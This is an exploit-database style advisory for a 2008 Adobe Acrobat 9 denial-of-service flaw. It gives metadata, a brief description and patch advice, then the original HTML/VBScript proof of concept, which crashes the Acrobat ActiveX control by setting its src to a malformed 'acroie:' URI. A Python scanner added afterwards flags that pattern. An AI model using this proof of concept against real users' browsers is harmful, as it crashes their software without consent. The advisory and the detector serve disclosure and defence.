Vendor: Acrobat
By: Jeremy Brown
CVSS: 7.8 (HIGH)
Denial of Service
CWE: 20
Product Name: Acrobat
Affected Version From: Adobe Acrobat 9
Affected Version To: Adobe Acrobat 9
Patch Exists: Yes
Related CWE: N/A
CPE: a:adobe:acrobat:9.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows Vista, IE7
2008

Adobe Acrobat 9 Remote DoS

Jeremy Brown discovered a vulnerability in Adobe Acrobat 9 that allows remote attackers to cause a denial of service via a crafted URI. The vulnerability exists because the application fails to properly handle certain URIs. An attacker can exploit this vulnerability by enticing a user to open a malicious URI.

Mitigation:

Adobe has released an update to address this vulnerability. Users are advised to update to the latest version of Adobe Acrobat 9.

Exploit-DB raw data:

<!-- Jeremy Brown (0xjbrown41@gmail.com/jbrownsec.blogspot.com)
     Adobe Acrobat 9 Remote DoS (--) Tested on AA9/IE7/Vista
     I can't seem to reproduce this on XP! Oh well.
     Of course the most popular app for reading pdfs is SfS/SfI :)
     Basically it will crash with any uri that adobe doesn't like.
     Also interesting: try with file:///DoS and look in bottom left area -->

<html><body>

<object id=target classid=clsid:CA8A9780-280D-11CF-A24D-444553540000></object>
<script language=vbscript>

arg1="acroie:///DoS"
target.src = arg1

</script>
</body></html>

# milw0rm.com [2008-09-11]
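
A defensive check for the pattern in the proof of concept above, as an added example that is not part of the original advisory or the author's code: it scans HTML for `<object>` tags carrying the Acrobat control's CLSID and reports script assignments that set the control's `src` to a URI whose scheme is outside an allow-list. The allow-list (`http`, `https`), the names `ControlScan` and `find_suspicious_src`, and the sample markup are assumptions made for this example.

```python
import re
from html.parser import HTMLParser

ACRO_CLSID = "clsid:ca8a9780-280d-11cf-a24d-444553540000"  # from the PoC on this page
ALLOWED_SCHEMES = {"http", "https"}  # assumed policy, adjust per site
STR_ASSIGN = re.compile(r'^\s*(\w+)\s*=\s*"([^"]*)"', re.M)
SRC_ASSIGN = re.compile(r'^\s*(\w+)\.src\s*=\s*(?:"([^"]*)"|(\w+))', re.M | re.I)
SCHEME = re.compile(r"^([a-z][a-z0-9+.\-]+):", re.I)  # 2+ chars, so "C:\" is not a scheme

# Constructed sample: one allowed assignment, one using the URI quoted on this page.
SAMPLE = """<object id=viewer classid=clsid:CA8A9780-280D-11CF-A24D-444553540000></object>
<script language=vbscript>
viewer.src = "https://example.com/a.pdf"
arg1="acroie:///DoS"
viewer.src = arg1
</script>"""

class ControlScan(HTMLParser):
    """Collect ids of <object> tags using the Acrobat CLSID, plus script bodies."""
    def __init__(self):
        super().__init__()
        self.ids, self.scripts, self.in_script = set(), [], False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "object" and a.get("classid", "").lower() == ACRO_CLSID:
            self.ids.add(a.get("id", "").lower())
        self.in_script = tag == "script"

    def handle_endtag(self, tag):
        self.in_script = False

    def handle_data(self, data):
        if self.in_script:
            self.scripts.append(data)

def find_suspicious_src(html):
    """Return (object id, uri) pairs where script sets .src to a disallowed scheme."""
    scan = ControlScan()
    scan.feed(html)
    scan.close()
    hits = []
    for body in scan.scripts:
        # Resolve only simple `name = "literal"` assignments; anything else is skipped.
        literals = {n.lower(): v for n, v in STR_ASSIGN.findall(body)}
        for obj, lit, var in SRC_ASSIGN.findall(body):
            uri = literals.get(var.lower()) if var else lit
            s = SCHEME.match(uri or "")
            if obj.lower() in scan.ids and s and s.group(1).lower() not in ALLOWED_SCHEMES:
                hits.append((obj.lower(), uri))
    return hits
```

The check is static and only follows string literals and single-step variable assignments, so a miss does not mean a page is clean; relative URIs with no scheme are not reported.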